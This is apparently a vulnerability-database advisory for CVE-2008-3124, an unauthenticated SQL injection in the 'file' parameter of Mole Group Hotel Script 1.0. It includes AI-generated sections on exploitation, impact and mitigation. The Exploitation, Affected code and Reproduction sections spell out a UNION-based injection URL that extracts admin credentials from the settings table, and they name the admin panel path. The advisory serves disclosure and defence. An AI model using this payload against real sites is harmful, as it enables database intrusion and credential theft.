VYPR
← All advisories
Unrated severityNVD Advisory· Published Jul 10, 2008· Updated Apr 23, 2026

CVE-2008-3124

CVE-2008-3124

Description

Mole Group Hotel Script 1.0 suffers from a remote SQL injection in the file parameter, allowing attackers to extract database contents.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Mole Group Hotel Script 1.0 suffers from a remote SQL injection in the file parameter, allowing attackers to extract database contents.

Vulnerability

Mole Group Hotel Script 1.0 contains a SQL injection vulnerability in index.php via the file parameter. The application fails to sanitize user-supplied input before incorporating it into an SQL query [1]. This allows an attacker to inject arbitrary SQL commands. The vulnerable query is constructed directly from the file variable without proper escaping or parameterization [1].

Exploitation

The attacker can exploit this vulnerability by sending a crafted HTTP request to index.php with a malicious file parameter. No authentication is required; the attacker only needs network access to the web server [1]. An example exploit URL is: http://site.com/index.php?file=1/**/UNION/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/* This injection bypasses spaces using comments and extracts data from the settings table [1].

Impact

Successful exploitation allows an attacker to execute arbitrary SQL commands, leading to disclosure of sensitive information stored in the database, such as the application's configuration settings (e.g., database credentials, site configuration) [1]. The attacker can potentially retrieve any data from the database, including user credentials or other confidential records.

Mitigation

No official patch or fixed version has been released by the vendor; according to the exploit disclosure, the vendor was not notified [1]. Users should upgrade to a newer supported version if available, otherwise apply input validation and parameterized queries to the file parameter as a workaround [1]. The vulnerability is not listed in CISA KEV as of this writing.

References
  1. OffSec’s Exploit Database Archive

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Mole Group/Hotel Script2 versions
    cpe:2.3:a:mole_group:hotel_script:1.0:*:*:*:*:*:*:*+ 1 more
    • cpe:2.3:a:mole_group:hotel_script:1.0:*:*:*:*:*:*:*
    • (no CPE)range: = 1.0

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input sanitization in the "file" parameter of index.php allows SQL injection."

Attack vector

An unauthenticated remote attacker sends an HTTP GET request to index.php with a crafted "file" parameter containing SQL injection payloads [ref_id=1]. The application fails to neutralize special SQL syntax in this parameter, allowing the attacker to inject arbitrary SQL commands [CWE-89]. The exploit demonstrates a UNION-based injection that extracts data from the "settings" table, including the admin password via the CONVERT function [ref_id=1]. The only precondition is network access to the vulnerable web application.

Affected code

The vulnerability exists in index.php of Mole Group Hotel Script 1.0. The "file" parameter is passed directly into an SQL query without sanitization, as shown in the exploit: `http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*` [ref_id=1]. No patch file is available in the bundle.

What the fix does

No patch is included in the bundle, and the advisory states the vendor was not notified before disclosure [ref_id=1]. The remediation would require properly sanitizing or parameterizing the "file" variable before including it in SQL queries, such as using prepared statements or escaping special characters [CWE-89]. Without a fix, the application remains vulnerable to SQL injection via the file parameter.

Preconditions

  • networkNetwork access to the vulnerable web application
  • authNo authentication required

Reproduction

Visit `http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*` to extract admin credentials from the settings table [ref_id=1]. The admin login panel is located at `/admin/` [ref_id=1].

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.